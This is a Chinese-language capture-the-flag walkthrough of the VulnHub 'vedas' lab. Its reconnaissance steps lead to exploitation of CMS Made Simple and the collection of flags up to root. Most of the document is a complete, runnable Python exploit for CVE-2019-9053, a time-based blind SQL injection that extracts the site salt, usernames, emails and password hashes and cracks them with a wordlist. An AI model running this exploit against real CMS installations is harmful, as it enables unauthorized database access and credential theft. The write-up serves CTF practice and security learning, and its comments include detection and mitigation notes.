渗透测试-CTF-VulnHub - vedas
arp-scan -l 扫描靶机IP地址
nmap -sV -Pn -A x.x.x.129
访问 80 端口，未发现可利用信息
打开msf,使用snmp_enum查看信息
输入靶机IP地址,获得第一个flag
使用 cewl 生成字典文件，再次用 dirb 进行目录遍历
dirb扫描
发现目录
查找该 CMS 的漏洞信息，发现存在 CVE-2019-9053
获取 PoC 代码
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
# Time-based blind SQL injection PoC for CVE-2019-9053 (CMS Made Simple, News
# module). Each routine below recovers one value (salt, username, email,
# password hash) one character at a time: a candidate prefix is embedded in a
# LIKE '...%' clause together with sleep(sleep_time), and a response that takes
# at least sleep_time seconds is taken as "prefix matches". No response body is
# parsed — timing is the only oracle.
# Detection: a burst of GETs to moduleinterface.php whose m1_idlist carries
# "select+sleep(" and whose response times cluster at sleep_time or above.
# Mitigation: apply the vendor fix for CVE-2019-9053.

# Injection point: the News module's m1_idlist parameter.
url_vuln = 'http://10.10.10.128/Kashyapa/moduleinterface.php?mact=News,m1_,default,0&m1_idlist='
# One keep-alive session reused for every probe request.
session = requests.Session()
# Candidate characters tried, in this order, at each position.
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
# Shared loop-control flag: every extraction routine expects it to be True on
# entry and sets it back to True on exit.
flag = True
# Password hash read from cms_users (compared against md5(salt + word) later).
password = ""
# Seconds the injected sleep() is asked to stall; a response at least this
# slow is treated as a "true" oracle answer.
sleep_time = 1
username = ""
# Accumulated report text, printed by beautify_print().
result = ""
email = ""
# "sitemask" site preference read from cms_siteprefs, used as the hash salt.
salt = ""
def get_salt():
    """Recover the ``sitemask`` site preference (the password salt) into the
    global ``salt``, one character per outer iteration, via the timing oracle.

    Relies on the module-level ``flag`` being True on entry and leaves it True
    on exit. Appends a report line to the global ``result``.
    """
    global flag
    global salt
    global result
    salt = ""
    ord_salt = ""  # hex encoding of `salt`, as embedded in the 0x... literal
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            # 0x736974656d61736b is "sitemask"; the trailing "25" is "%", so the
            # condition is `sitepref_value LIKE '<prefix>%'` and sleep() only
            # fires when the guessed prefix is right.
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)  # response body is never inspected
            elapsed_time = time.time() - start_time
            # Any response slower than sleep_time, whatever the cause, counts
            # as a hit for this character.
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    # The outer loop ends once no candidate triggers the delay, i.e. the value
    # has been read to its end.
    flag = True  # restore the entry precondition for the next routine
    result += '\n[+] Salt for password found: ' + salt
def get_username(userid):
    """Recover ``cms_users.username`` for ``userid`` into the global ``username``.

    Same timing-oracle loop as get_salt(). Returns True if at least one
    character was recovered (the id exists), False otherwise; main() uses the
    False case to stop enumerating ids.
    """
    global flag
    global username
    global result
    username = ""
    ord_username = ""  # hex encoding of `username`, embedded as a 0x... literal
    ord_username_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_username = username + dictionary[i]
            ord_username_temp = ord_username + hex(ord(dictionary[i]))[2:]
            # "%3d" is "=", so the clause is `user_id=<userid>`; the trailing
            # "25" is the "%" LIKE wildcard.
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+username+like+0x" + ord_username_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)  # response body is never inspected
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:  # delay observed -> prefix accepted
                flag = True
                break
        if flag:
            username = temp_username
            ord_username = ord_username_temp
    result += '\n[+] Username found: ' + username
    flag = True  # restore the entry precondition for the next routine
    if username:
        return True
    else:
        return False
def get_email(userid):
    """Recover ``cms_users.email`` for ``userid`` into the global ``email``.

    Same timing-oracle loop as get_salt(); unlike get_username() it returns
    nothing. Appends a report line to the global ``result``.
    """
    global flag
    global email
    global result
    email = ""
    ord_email = ""  # hex encoding of `email`, embedded as a 0x... literal
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            # `email LIKE '<prefix>%' AND user_id=<userid>` ("%3d" is "=",
            # trailing "25" is "%").
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)  # response body is never inspected
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:  # delay observed -> prefix accepted
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    result += '\n[+] Email found: ' + email
    flag = True  # restore the entry precondition for the next routine
def get_password(userid):
    """Recover the stored ``cms_users.password`` value for ``userid`` into the
    global ``password``.

    Same timing-oracle loop as get_salt(). The recovered value is the stored
    hash, which crack_password() then compares against md5(salt + word).
    """
    global flag
    global password
    global result
    password = ""
    ord_password = ""  # hex encoding of `password`, embedded as a 0x... literal
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            # Same clause shape as the other routines, built in two pieces:
            # `password LIKE '<prefix>%' AND user_id=<userid>`.
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)  # response body is never inspected
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:  # delay observed -> prefix accepted
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True  # restore the entry precondition for the next routine
    result += '\n[+] Password found: ' + password
def crack_password():
    """Look up the extracted password hash in a local wordlist.

    For each line of the wordlist, md5(salt + line) is compared with the
    global ``password``; the first match is appended to ``result``. Nothing is
    reported when no line matches.
    """
    global password
    global result
    global salt
    # Path of the generated wordlist file; adjust as needed.
    # (`dict` shadows the builtin name.)
    dict = open("/root/dic.txt")
    for line in dict.readlines():
        line = line.replace("\n", "")  # strip only the newline; other whitespace is kept
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            result += "\n[+] Password cracked: " + line
            break
    dict.close()  # not reached if the loop raises; a with-block would guarantee closing
def beautify_print():
    """Print the accumulated ``result`` report in bold green via termcolor."""
    report = result
    cprint(report, color='green', attrs=['bold'])
def main():
    """Drive the extraction for user ids 1..9 and print one report per user.

    For each id the salt is re-read (its query does not depend on the id, so
    every iteration recovers the same string), then username, email and
    password hash are recovered and the hash is checked against the wordlist.
    The loop stops at the first id for which no username is found.
    """
    global result
    for i in range(1, 10):
        get_salt()
        user_exist = get_username(i)
        if user_exist:
            get_email(i)
            get_password(i)
            crack_password()
            beautify_print()
            result = ""  # reset the report buffer for the next user
        else:
            break
main()  # module-level call: runs on import as well, there is no __main__ guard
登录
在Default Extensions中发现第二个flag
发现可以 ssh 登录，于是进行登录
进入 opt/test 目录，查看第三个 flag
找到第三个flag
三个 flag 有一个共同点：将 Way to Root 做字符串连接后得到 0e462097431906509019562988736854，查询该值对应的密码，结果为 240610708
查看 home 目录，发现有 vedas 用户；随后登录 root 用户
在root目录下查看flag